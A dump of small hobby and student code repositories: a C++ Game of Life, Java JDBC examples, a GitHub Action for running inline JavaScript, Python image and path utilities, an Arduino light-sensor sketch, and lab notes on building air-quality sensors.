    sf::RenderWindow window(sf::VideoMode(Width, Height), "Project 1 - the game of life", sf::Style::Titlebar | sf::Style::Close);
    window.setFramerateLimit(60);

    // Fill the global grid with dead cells.
    for (int i = 0; i < cellsWide; i++) { //for each row of the cell matrix
        std::vector<cell> temp; //make a temp vector of cells
        for (int j = 0; j < cellsWide; j++) { // for each cell in a row of the matrix
            cell toAdd(i,j);
            temp.push_back(toAdd);
        }
        cells.push_back(temp);
    }
    //cells[1][1].birth();
    //std::cout << numNeighbors(cells[1][1]) << "\n";

    int paused = 1; //1 for not paused -1 for paused
    sf::Clock clock;
    while (window.isOpen())
    {
        sf::Event event;
        while (window.pollEvent(event))
        {
            if (event.type == sf::Event::Closed) {
                window.close();
            }
            // Space toggles the simulation on/off.
            if (event.type == (sf::Event::KeyPressed)) {
                if (event.key.code == sf::Keyboard::Space)
                {
                    paused = paused * -1;
                    if (paused == -1) { std::cout << "paused \n"; }
                    else { std::cout << "unpaused \n"; }
                }
            }
            // Click toggles the cell under the cursor.
            if (event.type == sf::Event::MouseButtonPressed) {
                sf::Vector2i mousePos = sf::Mouse::getPosition(window);
                if (cells[floor(mousePos.x / cellSize)][floor(mousePos.y / cellSize)].isAlive()) {
                    cells[floor(mousePos.x / cellSize)][floor(mousePos.y / cellSize)].kill();
                }
                else { cells[floor(mousePos.x / cellSize)][floor(mousePos.y / cellSize)].birth(); }
            }
        }

        if (clock.getElapsedTime() > sf::seconds(timeBetweenUpdates)) {
            if (paused == 1) { // advance the grid by one generation
                // Two-phase update: decide everyone's fate first, then apply
                // it, so mid-update changes don't skew neighbor counts.
                std::vector<std::vector<bool>> livingList; // used to keep track who should be alive or dead in the next round
                for (int i = 0; i < cells.size(); i++) {
                    std::vector<bool> temp;
                    for (int j = 0; j < cells[i].size(); j++) {
                        // NOTE(review): numNeighbors() may be called up to 3x
                        // per cell here; caching the count would be cheaper.
                        if (numNeighbors(cells[i][j]) == 3) { temp.push_back(true); } // 3 neighbors birth a cell
                        else if (numNeighbors(cells[i][j]) <= 1) { temp.push_back(false); } // 1 or less live cells around and you will die
                        else if ((numNeighbors(cells[i][j]) == 2 && cells[i][j].isAlive())) { temp.push_back(true); } // if your already alive and have two neighbors you get to keep living
                        else { temp.push_back(false); }
                    }
                    livingList.push_back(temp);
                }
                for (int i = 0; i < cells.size(); i++) { //for each row of the cell matrix
                    for (int j = 0; j < cells[i].size(); j++) { // for each cell in a row of the matrix
                        if (livingList[i][j] == true) { cells[i][j].birth(); }
                        else { cells[i][j].kill(); }
                    }
                }
                livingList.clear();
                /*for (int i = 0; i < temp.size(); i++) { //for each row of the cell matrix
                for (int j = 0; j < temp[i].size(); j++) { // for each cell in a row of the matrix
                if (!temp[i][j].isAlive() && (numNeighbors(temp[i][j]) == 3)) { cells[i][j].birth(); } // 3 neighbors birth a cell
                else if (temp[i][j].isAlive() && (numNeighbors(temp[i][j]) < 2)) { cells[i][j].kill(); } // 1 or less cells around you is not enough to live, die from isolation
                else if (temp[i][j].isAlive() && (numNeighbors(temp[i][j]) > 3)) { cells[i][j].kill(); } //overcrounding with 4 or more cells causes death.
                }
                }*/
            }
            clock.restart();
        }

        // Draw every cell each frame.
        for (int i = 0; i < cells.size(); i++) { //for each row of the cell matrix
            for (int j = 0; j < cells[i].size(); j++) { // for each cell in a row of the matrix
                window.draw(cells[i][j].getBody()); // draw the cell
            }
        }
        window.display();
        window.clear(sf::Color::White);
    }
    return 0;
} | 72ec58da17256efbfdc278d1866478288b2ed47c | [
"C++"
] | 1 | C++ | mdrief4/Projects | 65a686141e27665c6b5302cba859666538d96c88 | c9a81e04b63c02cce9885ddb12fb7cc99bf08c71 |
refs/heads/master | <repo_name>AmhH/test-jdbc<file_sep>/src/com/example/crud/UpdatableResultSet.java
package com.example.crud;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import com.example.DBUtil;
import com.example.DBUtil.DBType;
/**
 * Demonstrates an updatable, scrollable JDBC ResultSet: edits one existing
 * row in place and inserts a brand-new row without writing explicit
 * UPDATE/INSERT SQL.
 */
public class UpdatableResultSet {
    public static void main(String[] args) throws SQLException {
        //Try with resources: connection, statement and result set are closed automatically
        try (
            Connection conn = DBUtil.getConnection(DBType.MSSQL);
            // Scroll-insensitive + updatable so we can jump to a row and edit it in place.
            Statement stmt = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_UPDATABLE);
            ResultSet rs = stmt.executeQuery("select * from Employees");
        ){
            // Jump directly to row 6 and change its Department column.
            rs.absolute(6);
            rs.updateString("Department", "IT");
            rs.updateRow(); // push the in-memory change back to the database
            System.out.println("Record updated successfully");
            // Move to the special "insert row" buffer, fill it, and insert it.
            rs.moveToInsertRow();
            rs.updateInt("employeeId", 23);
            rs.updateString("name", "Manew");
            rs.insertRow();
            System.out.println("Resord has been Inserted");
        }catch (SQLException e) {
            DBUtil.showErrorMessage(e);
        }
    }
}
<file_sep>/src/com/example/connection/ConnectionPoolingDemo.java
package com.example.connection;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

import javax.sql.PooledConnection;
/**
 * Demonstrates obtaining a pooled connection from Oracle's
 * OracleConnectionPoolDataSource.
 *
 * NOTE(review): requires the Oracle JDBC driver (ojdbc) on the classpath and
 * an import of oracle.jdbc.pool.OracleConnectionPoolDataSource, which this
 * file does not yet declare — confirm before building.
 */
public class ConnectionPoolingDemo {
    public static void main(String[] args) throws SQLException {
        // Fixed typo: the class was previously spelled "OracleConnectionPoolDataDource".
        OracleConnectionPoolDataSource ds = new OracleConnectionPoolDataSource();
        ds.setDriverType("thin");
        ds.setServerName("localhost");
        ds.setPortNumber(1521); // setPortNumber expects an int, not a String
        ds.setServiceName("xe");
        ds.setUser("hr");
        ds.setPassword("hr");

        PooledConnection pconn = ds.getPooledConnection();
        // try-with-resources releases the statement and logical connection,
        // returning the physical connection to the pool.
        try (Connection conn = pconn.getConnection();
             Statement stmt = conn.createStatement();
             ResultSet rs = stmt.executeQuery("select * from address")) {
            // Iterate rs here; resources are closed automatically.
        }
    }
}
<file_sep>/src/com/example/DBUtil.java
package com.example;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
public class DBUtil {
private static final String mySqlUser = "rot";
private static final String mySqlPwd = "<PASSWORD>";
private static final String mySqlCS = "jdbc:mysql://localhost:3306/abyssinia";
public enum DBType{
ORACLE, MYSQL, MSSQL;
}
public static Connection getConnection(DBType dbType) throws SQLException {
switch(dbType) {
case MYSQL:
return DriverManager.getConnection(mySqlCS, mySqlUser, mySqlPwd);
default:
return null;
}
}
public static void showErrorMessage(SQLException exception) {
System.err.println("Error :" + exception.getMessage());
System.err.println("Error COde :" + exception.getErrorCode());
}
}
<file_sep>/README.md
# test-jdbc
Add MySql or Oracle connection drivers to work with this project<file_sep>/src/com/example/crud/PreparedStatementInsert.java
package com.example.crud;
import java.sql.Connection;
import java.sql.Date;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import com.example.DBUtil;
import com.example.DBUtil.DBType;
/**
 * Inserts one row into the newemployee table using a PreparedStatement.
 */
public class PreparedStatementInsert {
    public static void main(String[] args) throws SQLException {
        // BUG FIX: the SQL previously ended with "?}" instead of "?)",
        // which is invalid SQL and would fail at prepare/execute time.
        String sql = "INSERT INTO newemployee values(?,?,?,?)";
        // try-with-resources closes the connection and statement automatically
        // (the original leaked both).
        try (Connection conn = DBUtil.getConnection(DBType.MSSQL);
             PreparedStatement pstmt = conn.prepareStatement(sql)) {
            pstmt.setInt(1, 50);
            pstmt.setString(2, "email");
            // BUG FIX: parameters 3 and 4 previously reused index 2, so the
            // email value was overwritten and parameters 3/4 were never bound.
            pstmt.setString(3, "name");
            pstmt.setDate(4, new Date(4567890L));
            int result = pstmt.executeUpdate();
            if(result == 1) {
                System.out.println("Inserted sucessfully");
            }else {
                System.err.println("Something went wrong");
            }
        }catch (SQLException e) {
            DBUtil.showErrorMessage(e);
        }
    }
}
<file_sep>/src/com/example/crud/IteratingWithResultSet.java
package com.example.crud;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import com.example.DBUtil;
import com.example.DBUtil.DBType;
/**
 * Streams the Employees table to stdout and reports how many rows were read.
 */
public class IteratingWithResultSet {
    public static void main(String[] args) throws SQLException {
        //Try with resources: no need to close the connection explicitly
        try (
            Connection conn = DBUtil.getConnection(DBType.MSSQL);
            Statement stmt = conn.createStatement();
            ResultSet rs = stmt.executeQuery("select * from Employees");
        ){
            String format = "%-4s%-20s%-25s%-10f\n";
            // BUG FIX: rs.getRow() returns 0 once the cursor has moved past the
            // last row (i.e. after next() returns false), so the original
            // always printed "Total ROws : 0". Count rows explicitly instead.
            int rowCount = 0;
            while(rs.next()) {
                System.out.format(format, rs.getString("Employee_I"), rs.getString("First_name"), rs.getString("last_name"), rs.getFloat("salary"));
                rowCount++;
            }
            System.out.println("Total ROws : " + rowCount);
        }catch (SQLException e) {
            DBUtil.showErrorMessage(e);
        }
    }
}
| 550be9c2f666dea60048ad6c4ce5c4bd776d851d | [
"Markdown",
"Java"
] | 6 | Java | AmhH/test-jdbc | 2fd8ee526910bc238d161d7c060a37fabbcc2d6c | aa90cff76605b34d7c3a9ee8d85328f45be07bd5 |
refs/heads/master | <repo_name>satackey/action-js-inline<file_sep>/index.ts
import * as core from '@actions/core'
import exec from 'actions-exec-wrapper'
// Packages that are always installed so the inline script can use the
// GitHub Actions toolkit without listing them in `required-packages`.
const defaultPackages = [
  '@actions/core',
  '@actions/exec',
  '@actions/github',
  'actions-exec-listener',
]
// Constructor for async functions — lets the user script be compiled with
// support for top-level `await`.
// https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/AsyncFunction
const AsyncFunction = Object.getPrototypeOf(async () => {}).constructor
// The node package managers this action knows how to drive.
type PackageManager = 'npm' | 'yarn'
// Narrows `manager` to PackageManager, throwing for any other value.
function assertIsPackageManager(manager: string): asserts manager is PackageManager {
  const known = ['npm', 'yarn']
  if (!known.includes(manager)) {
    throw new Error(`Specified node package manager is ${manager}, neither npm nor yarn.`)
  }
}
// Installs `packages` with the chosen package manager, running inside this
// action's own directory so node_modules lands next to the compiled code.
const installPackages = async (manager: PackageManager, packages: string[]) => {
  const command = manager === 'npm' ? 'npm install' : 'yarn add'
  if (packages.length < 1) {
    console.log('There is no package to install.')
    return
  }
  // Group the installer output in the workflow log.
  core.startGroup(`${command} ${packages.join(' ')}`)
  await exec.exec(command, packages, {
    cwd: __dirname,
  })
  core.endGroup()
}
// Compiles the user-supplied snippet into an async function and runs it,
// exposing a fixed set of Node globals to the script body.
const runScript = async (script: string) => {
  const exposed: { [key: string]: any } = {
    Buffer,
    __dirname,
    __filename,
    console,
    exports,
    module,
    process,
    require,
    TextDecoder,
    TextEncoder,
    URL,
    URLSearchParams,
    WebAssembly,
  }
  const names = Object.keys(exposed)
  const values = Object.values(exposed)
  const compiled = new AsyncFunction(names, script)
  return await compiled(...values)
}
// Entry point: read the action inputs, install dependencies, run the script.
const main = async () => {
  const manager = core.getInput('package-manager', { required: true })
  assertIsPackageManager(manager)
  const userPackages = core.getInput('required-packages')
    .split(/\n|\s/) // split on newlines or whitespace
    .filter(name => name !== '') // drop empty entries
  const script = core.getInput('script', { required: true })
  console.log(script)
  await installPackages(manager, [...userPackages, ...defaultPackages])
  await runScript(script)
}
// Kick off the action; any unhandled rejection fails the workflow step.
main().catch(e => {
  console.error(e)
  core.setFailed(`An error occurred: ${e.message || JSON.stringify(e)}`)
})
<file_sep>/README.md
# satackey/action-js-inline
Run JavaScript instead of shell script in GitHub Actions.
## Example
```yaml
- name: Output current branch name & date
# To use latest action, specify "release-master" instead of "v0.0.2"
uses: satackey/action-js-inline@v0.0.2
id: getdata
with:
# Edit the following line to install packages required to run your script.
required-packages: axios
script: |
const core = require('@actions/core')
const axios = require('axios')
// branch
const ref = process.env.GITHUB_REF // refs/heads/master
const branch = ref.split('/').slice(-1)[0] // refs/heads/master → master
console.log(`branch: ${branch}`)
core.setOutput('branch', branch)
// date
const dateResponse = await axios('https://ntp-a1.nict.go.jp/cgi-bin/json')
/* {
"id": "ntp-a1.nict.go.jp",
"it": 0.000,
"st": 1585285722.922,
"leap": 36,
"next": 1483228800,
"step": 1
} */
const date = new Date(dateResponse.data.st)
console.log(`date: ${date}`)
core.setOutput('date', date)
# You can use datas as ${{ steps.getdata.outputs.branch }} and ${{ steps.getdata.outputs.date }}
```
## Inputs
- `package-manager` required, default: `npm`
The package manager used to install the required packages.
Either `npm` or `yarn`.
- `required-packages` optional
    Line or space separated package names required to execute the script.
> Info: The following packages are automatically installed even if you do not write them.
> - [`@actions/core`](https://github.com/actions/toolkit/tree/master/packages/core)
> - [`@actions/exec`](https://github.com/actions/toolkit/tree/master/packages/exec)
> - [`@actions/github`](https://github.com/actions/toolkit/tree/master/packages/github)
> - [`actions-exec-listener`](https://github.com/satackey/actions-exec-listener)
- `script` **Required**
The JavaScript snippet to be executed. The [await](https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/await) operator is supported.
## Contribution
PRs are accepted.
If you are having trouble or feature request, [post new issue](https://github.com/satackey/action-js-inline/issues/new).
<!-- ## Another Example -->
| 9b21a4464693f7057d8bd2d8b4381219271c95e0 | [
"Markdown",
"TypeScript"
] | 2 | TypeScript | satackey/action-js-inline | 3a7d2f354bd40d9a02507772062211aa317fdc24 | 3eb8aa97455fce0b0cfec3739682795e56f3dc41 |
refs/heads/master | <repo_name>haydenmcmullin/U1A3<file_sep>/README.md
# U1A3
school work
<file_sep>/RoachPopulation.java
//<NAME>
//U1A3 Roach Population
/**
 * Simulates a roach population that doubles over time and is reduced by
 * spraying insecticide.
 */
public class RoachPopulation {
    int num; // current roach head-count

    /** Starts the simulation with a population of 100 roaches. */
    public RoachPopulation() {
        num = 100;
    }

    /** Simulates time passing: the population doubles. */
    public void timePasses() {
        num *= 2;
    }

    /** Spraying kills 10% of the roaches (integer arithmetic truncates). */
    public void spray() {
        num = (num * 90) / 100;
    }

    /** @return the current total roach population */
    public double getRoaches() {
        return num;
    }
}
| 1b596d30656f4ee34ab06f9de993ff3ad18c2c06 | [
"Markdown",
"Java"
] | 2 | Markdown | haydenmcmullin/U1A3 | 48a8945edb1c49e978bf307acb8315c70d6de56b | 3a858b8cd86b4aa09c899f84d42933c1594da7b7 |
refs/heads/master | <file_sep>from getmac import get_mac_address
# Device MAC address with colons stripped — used to tag data directories and filenames.
macAddress = (get_mac_address()).replace(":","")
def getDirPath(time):
    """Return the raw-data directory for *time*: MintsData/raw/<mac>/YYYY/MM/DD."""
    pieces = ["MintsData/raw/" + str(macAddress), str(time.year),
              '%02d' % time.month, '%02d' % time.day]
    return "/".join(pieces)
def getFilePath(time, dir, name):
    """Return the daily CSV path inside *dir*: MINTS_<mac>_<name>_YYYY_MM_DD.csv."""
    fileName = "_".join(["MINTS", macAddress, name, str(time.year),
                         '%02d' % time.month, '%02d' % time.day]) + ".csv"
    return dir + "/" + fileName
<file_sep>import numpy as np
import cv2
import sys
import csv
from skimage import io, color
# Extract per-pixel color features from 'startrails.jpg' and append them to
# colors.csv. Each CSV row is one pixel: R, G, B, H, S, V, L*, a*, b*.
img = cv2.imread('startrails.jpg')
# Get RGB data
inputImage_RGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)
Image_Array_RGB = np.array(inputImage_RGB)
Image_Shape = Image_Array_RGB.shape
# Flatten each channel into an (N, 1) column so the channels can be stacked side by side.
One_D_Image_Red = np.transpose(np.matrix(Image_Array_RGB[:, :, 0].ravel()))
One_D_Image_Green = np.transpose(np.matrix(Image_Array_RGB[:, :, 1].ravel()))
One_D_Image_Blue = np.transpose(np.matrix(Image_Array_RGB[:, :, 2].ravel()))
One_D_Image_RGB = np.concatenate((One_D_Image_Red, One_D_Image_Green, One_D_Image_Blue), axis=1)
# Get HSV data
inputImage_HSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
Image_Array_HSV = np.array(inputImage_HSV)
One_D_Image_Hue = np.transpose(np.matrix(Image_Array_HSV[:, :, 0].ravel()))
One_D_Image_Saturation = np.transpose(np.matrix(Image_Array_HSV[:, :, 1].ravel()))
One_D_Image_Value = np.transpose(np.matrix(Image_Array_HSV[:, :, 2].ravel()))
One_D_Image_HSV = np.concatenate((One_D_Image_Hue, One_D_Image_Saturation, One_D_Image_Value), axis=1)
# Get LAB Data (skimage reads the file again because it wants RGB input, not OpenCV's BGR)
inputImage_LAB = color.rgb2lab(io.imread('startrails.jpg'))
Image_Array_LAB = np.array(inputImage_LAB)
One_D_Image_L = np.transpose(np.matrix(Image_Array_LAB[:, :, 0].ravel()))
One_D_Image_A = np.transpose(np.matrix(Image_Array_LAB[:, :, 1].ravel()))
One_D_Image_B = np.transpose(np.matrix(Image_Array_LAB[:, :, 2].ravel()))
One_D_Image_LAB = np.concatenate((One_D_Image_L, One_D_Image_A, One_D_Image_B), axis=1)
One_D_Image = np.concatenate((One_D_Image_RGB, One_D_Image_HSV, One_D_Image_LAB), axis=1)
title = "Red, Green, Blue, Hue, Saturation, Color, Lightness, A*, B*"
# BUG FIX: np.savetxt was previously given the *filename* while inside a
# `with open("colors.csv", "a")` block, so it reopened the file in write mode
# and clobbered any existing rows, defeating the append. Passing the already
# open append-mode handle preserves earlier data.
with open("colors.csv", "a") as csvFile:
    np.savetxt(csvFile, One_D_Image, delimiter=",", header=title, fmt='%3.f', comments='')
<file_sep>/*
Adapted from example code.
Displays visible, IR, and UV light brightness.
*/
#include <Arduino.h>
#include <Wire.h>
#include "SI114X.h"
SI114X SI1145 = SI114X();
// One-time initialization: open the serial port and block until the Si1145
// light sensor responds over I2C.
void setup() {
    Serial.begin(9600);
    Serial.println("Beginning Si1145!");
    // Retry once per second until the sensor answers.
    while (!SI1145.Begin()) {
        Serial.println("Si1145 is not ready!");
        delay(1000);
    }
    Serial.println("Si1145 is ready!");
}
// Print one visible/IR/UV reading block per second.
void loop() {
    Serial.print("---\n");
    Serial.println("Vis: "); Serial.println(SI1145.ReadVisible());
    Serial.println("IR: ");
    Serial.println(SI1145.ReadIR());
    // The UV register reports the UV index multiplied by 100, so divide by
    // 100 to recover the real value (see the Si1145 datasheet).
    Serial.println("UV: ");
    Serial.println(float(SI1145.ReadUV())/100);
    delay(1000);
}
<file_sep># Daily Notes
## Monday June 24, 2019
### Task 1: Disassembling Of Particulate Matter Sensor
Today's work consisted of disassembling particulate matter (PM) sensors. There were two sections within these sensors:
- A portion containing the sensor itself (Optical Particle Counter) and an Argon Arduino Board to manage it.
- A portion containing a GPS, camera module, and the processing units
#### 1.1: Processing Portion (Interior)
**Main Components:**
- G-Mouse GPS Module
- USB 3 Power Hub
- 5.0 MP USB Camera Module
- Linux Computer - Odroid XU4 - central computing unit
- PCB (Argon)
- C1+ Module (Argon) - encrypts data to be sent
- Light Sensor Module
**Dismantling Process**
1. Remove box lid
2. Remove 3D printed frame and all components from box
3. Remove USBs and Ethernet cables
4. Remove USB hub and Ethernet-USB converter
5. Remove wires attached to terminal blocks in PCB
6. Unscrew all circuit boards (XU4 is on underside; PCB is on top; camera and light sensor on side.)
7. Remove GPS module
#### 1.2: Sensor Portion (Exterior)
**Main Components:**
- Steven Sunshields
- Optical Particle Counter (OPC)
- PCB (Manage OPC)
**Dismantling Process:**
1. Free wires from the lid of the interior portion
3. Unscrew and remove all steven sunshields except the base one
4. Unscrew PCB
5. Unplug all wires and cut zipties
**Homework For Today:**
- ~~Obtain basic familiarization with github~~
- ~~Finish daily notes~~
- ~~Chapter 2 Problems of C.M. book~~
__________________________________________________________________________________________________________________________________
## Tuesday June 25, 2019
### Task 2: Construction of Main Processing Unit For Shinyei Sensors
Work for today consisted of soldering and wiring circuit boards which would serve as the central management unit for the complete Shinyei<sup>[1]</sup> sensor.
The processes of soldering, applying heat shrinks, and stripping wires were learned today. Adam was expecting to have 5 of these 'guts' (as he referred to them) for the Shinyei built today between the two of us, but we managed to produce 10 before we were burnt out.
Experience was acquired soldering & dealing with construction of permanent circuitry instead of the breadboard stuff done at home.
**Main Components:**
- Seeduino Microcontroller
- Seeduino Base Shield - interfacing with sensors and OLED display
- Single Cell LiPO Charger (Sunny Buddy) - manages charging of battery from solar panel
- INA219 DC current sensor (×2) - current and voltage sensor, one for each of battery and solar panel
- Molex Connector (4-pin)
- Molex Connector (2-pin) (x2)
- Terminal Block (2-pin) (x2)
#### 2.1: Solder Connections From Seeduino To INA219s
1. Solder a 2-pin terminal block to each of two INA219 current sensors.
2. Cut a 4-pin Molex to Molex connecter in half and attach one end to the outermost Molex receiver on the Seeduino.
3. Split each of the four wires coming from the Molex connector attached to the Seeduino by soldering two wires onto each of the aforementioned four wires.
4. Solder a red split wire to VCC on an INA219.
5. Solder a black split wire to Gnd on the same INA219.
6. Solder a yellow split wire to Scl on the same INA219.
7. Solder a white split wire to Sda on the same INA219.
8. Repeat the previous four steps with the other INA219.
#### 2.2: Solder Connections From Single Cell LiPO Charger (Sunny Buddy)
9. Cut off a 2-pin Molex connecter from a LiPO battery.
10. Attach the Molex end to the Molex receiver on the Sunny Buddy.
11. Solder the black wire on the Molex wire to "Solar -" on the Sunny Buddy.
12. Solder a wire to "Solar -" from above the circuit board of the Sunny Buddy (the other end is loose and will act as a central Gnd).
13. Connect the red wire from the 2-pin Molex to Vin- on an INA219.
14. Connect "Solar +" from the Sunny Buddy to Vin- on the other INA219
#### 2.3: Concluding Steps
15. Push the Seeduino Base Shield onto the Seeduino and verify that the power switch is set to 3.3V.
16. Solder A0 on the INA219 to which "Solar +" was connected to change the address of an INA219 to have Seeduino be able to distinguish between the INA219s
Rough circuit sketch can be found on page 79 of research notebook.
**Homework For Today:**
- ~~Finish Daily Notes~~
- ~~Learn Some C++ Syntax~~
**[1]:** These are cheap air quality sensors that Lakitha and Adam intend on calibrating with machine learning to achieve the same level of accuracy as more expensive sensors. They plan on acquiring data from the expensive sensors and using it to train various ML models. Whichever performs most desirably will be used with the Shinyei sensor data to yield high accuracy with a low cost hardware.
**Note:** A crude circuit diagram for the Shinyei Sensor CMU can be found as an image in this directory.
__________________________________________________________________________________________________________________________________
## Wednesday, June 26, 2019
Work done today was using the different air quality sensors and coding them to display meaningful data.
### Task 3: Complete Arduino Exercises Given On Github
- Logged into the Arduino web IDE
- Finished exercises 2, 3 and 5; they were trivial
- Arduino IDE, Atom IDE, and Platform.io were preinstalled on the Ubuntu computer that was used for this
- Initially there was some difficulty with Exercise 8, largely due to the fact that no prior knowledge or experience existed about Ubuntu OS and Atom IDE, but after some searching the problems were resolved.
- Most modules I had worked with in the past required specification of which pins were to be used. In the code provided, there was no such mention and therefore I thought the code was meant to be run without a sensor.
- Upon running the code, the outputs were all printing 0, so there was something wrong. Upon connecting the BME280 sensor, the readings became normal.
### Task 4: Obtain Familiarization With The Air Quality Sensors
These consisted of the following:
- BME280 - (Temperature, Pressure, Altitude, Humidity)
- TMG3993 - (Light, Gesture, RGBC, Proximity)
- SCD30 - (CO2 Concentration, Temperature, Humidity)
- Multichannel Gas Sensor - (Concentrations of NH<sub>3</sub>, CO, NO<sub>2</sub>, C<sub>3</sub>H<sub>8</sub>, C<sub>4</sub>H<sub>10</sub>, CH<sub>4</sub>, H<sub>2</sub>, C<sub>2</sub>H<sub>5</sub>OH)
#### 4.1: BME280 - Temperature, Pressure, Altitude, Humidity
Following is the code for Nano to print everything BME280 can sense with a update delay of 1 second
- Include libraries
- Initialize sensor as instance of BME280 object
- Setup
- - Initialize Wire
- - Initialize Serial with baud rate 9600
- - If sensor fails to initialize then print error
- Loop
- - Print all information acquired by sensor to Serial Monitor
- - Remember that altitude is calculated as a function of pressure
~~~~
/*
Written by <NAME>
*/
#include <Wire.h>
#include "Seeed_BME280.h"
BME280 sensor;
void setup() {
Wire.begin();
Serial.begin(9600);
Serial.println("BME280 Temperature, Pressure, Altitude, and Humidity");
if (!sensor.init()) {
Serial.print("Error with sensor");
}
}
void loop() {
Serial.print("Temperature: ");
Serial.print(sensor.getTemperature());
Serial.print(" C\nPressure: ");
Serial.print(sensor.getPressure());
Serial.print(" Pa");
Serial.print("\nAltitude: ");
Serial.print(sensor.calcAltitude(sensor.getPressure()));
Serial.print("m \nHumidity: ");
Serial.print(sensor.getHumidity());
Serial.print("% \n --- \n");
delay(1000);
}
~~~~
#### 4.2: TMG3993 - Light, Gesture, Proximity, RGBC
Following is the code for proximity detection from the TMG3993. It prints when proximity is detected or removed and LED_BUILTIN flashes when status of proximity changes.
- Include libraries
- Initialize sensor as instance of TMG3993 object
- Initialize status of proximity as 0 (removed)
- Setup
- - Initialize Serial with baud rate 9600 and print sensor info
- - Initialize Wire
- - If sensor fails to initialize then print error
- - Setup sensor for proximity detection
- Loop
- - Run following code only if sensor status is acquired and is valid (working properly)
- - - Get proximity of object to sensor
- - - If proximity is above threshold and status of proximity is 0 (removed) then print detection to Serial and set new status of proximity as 1 (detected)
- - - If proximity is below threshold and status of proximity is 1 (detected) then print detection to Serial and set new status of proximity as 0 (removed)
- - Delay 1 millisecond for stability
~~~~
/*
Written by <NAME>
*/
#include <Wire.h>
#include "Seeed_TMG3993.h"
TMG3993 sensor;
int proximity_status = 0;
void setup()
{
Serial.begin(9600);
Serial.println("TMG3993 Proximity and RGBC");
Wire.begin();
if (sensor.initialize() == false)
{
Serial.println("Check Wiring");
}
sensor.setupRecommendedConfigForProximity();
sensor.enableEngines(ENABLE_PON | ENABLE_PEN | ENABLE_PIEN);
}
void loop()
{
if (sensor.getSTATUS() & STATUS_PVALID)
{
int proximity = sensor.getProximityRaw();
if (proximity < 50 && proximity_status == 0) {
Serial.println("Proximity Detected");
proximity_status = 1;
}
if (proximity > 50 && proximity_status == 1) {
Serial.println("Proximity Removed");
proximity_status = 0;
}
}
delay(1);
}
~~~~
Following is the code for reading RGBC data (C stands for clear) for same sensor (TMG3993)
- Include libraries
- Initialize sensor as instance of TMG3993 object
- Setup
- - Initialize Serial with baud rate 9600 and print sensor info
- - Initialize Wire
- - If sensor fails to initialize then print error
- - Set up sensor for sensing RGBC
- Loop
- - Run following code only if sensor status is acquired and is valid (working properly)
- - - Initialize r, g, b, c, lux, cct
- - - Get RGBC data by passing pointers of r, g, b, c to getRGBCRaw function so that it may overwrite those values
- - - Pass r, g, b, c to getLux and getCCT functions to get illuminance in luxes and CCT (Correlated Color Temperature) in Kelvin
- - - Print all this info to Serial
- - Delay 1 second for stability and readability
~~~~
/*
Adapted From example code
*/
#include <Wire.h>
#include "Seeed_TMG3993.h"
TMG3993 sensor;
void setup()
{
Serial.begin(9600);
Serial.println("TMG3993 Proximity and RGBC");
Wire.begin();
if (sensor.initialize() == false)
{
Serial.println("Check wiring");
while (1);
}
sensor.setADCIntegrationTime(0xdb); // the integration time: 103ms
sensor.enableEngines(ENABLE_PON | ENABLE_AEN | ENABLE_AIEN);
}
void loop()
{
if (sensor.getSTATUS() & STATUS_AVALID)
{
int r,g,b,c;
int lux, cct;
sensor.getRGBCRaw(&r, &g, &b, &c);
lux = sensor.getLux(r, g, b, c);
cct = sensor.getCCT(r, g, b, c);
Serial.print("R: ");
Serial.print(r);
Serial.print("\tG: ");
Serial.print(g);
Serial.print("\tB: ");
Serial.print(b);
Serial.print("\tC: ");
Serial.println(c);
Serial.print("Lux: ");
Serial.print(lux);
Serial.print("\tCCT: ");
Serial.println(cct);
Serial.println("----");
sensor.clearALSInterrupts();
}
delay(1000);
}
~~~~
#### 4.3: SCD30 - CO2 Concentration, Temperature, Humidity
Following is code to detect all information from SCD30 sensor with measurement interval of 2 seconds.
- Include libraries
- Initialize sensor as instance of SCD30 object
- Setup
- - Initialize Wire
- - Initialize Serial with baud rate 9600 and print sensor information
- - Initialize sensor and set measurement interval 2 seconds
- Loop
- - Print sensor info to Serial Monitor
~~~~
/*
Written by <NAME>
*/
#include <Wire.h>
#include "SparkFun_SCD30_Arduino_Library.h"
SCD30 sensor;
void setup() {
Wire.begin();
Serial.begin(9600);
Serial.println("SCD30 CO2, Temperature, and Humidity");
sensor.begin();
sensor.setMeasurementInterval(2);
}
void loop() {
Serial.print("CO2 Concentration:");
Serial.print(sensor.getCO2());
Serial.print(" ppm\nTemperature: ");
Serial.print(sensor.getTemperature());
Serial.print(" C\nHumidity: ");
Serial.print(sensor.getHumidity());
Serial.print("%\n---\n");
}
~~~~
Similarly we can use
~~~~
sensor.setAltitudeCompensation(altitude in meters);
~~~~
and
~~~~
setAmbientPressure(pressure in millibars)
~~~~
to set default altitude and pressure respectively.
#### 4.4: Multichannel Gas Sensor - Concentrations of NH<sub>3</sub>, CO, NO<sub>2</sub>, C<sub>3</sub>H<sub>8</sub>, C<sub>4</sub>H<sub>10</sub>, CH<sub>4</sub>, H<sub>2</sub>, C<sub>2</sub>H<sub>5</sub>OH
Following is the code for printing all information from this sensor to Serial Monitor. Due to time constraints, preheating and calibration were omitted.
- Include libraries
- Setup
- - Initialize Serial with baud rate 9600
- - Initialize sensor communication and power on
- Loop
- - For each gass measurable by the sensor, find its concentration as sensed
- - If concentration < 0 ppm then print error
- - Otherwise print gas and corresponding concentration to Serial Monitor
- - Delay 1 second for stability and readability
~~~~
/*
Written by <NAME>
Displays concentrations of NH3, CO, NO2, C3H8, C4H10, CH4, H2, C2H5OH.
*/
#include <Arduino.h>
#include <Wire.h>
#include "MutichannelGasSensor.h"
void setup()
{
Serial.begin(9600);
gas.begin(0x04); //the default I2C address of the slave is 0x04
gas.powerOn();
}
void loop()
{
char gasses[8] = {'NH3', 'CO', 'NO2', 'C3H8', 'C4H10', 'CH4', 'H2', 'C2H5OH};
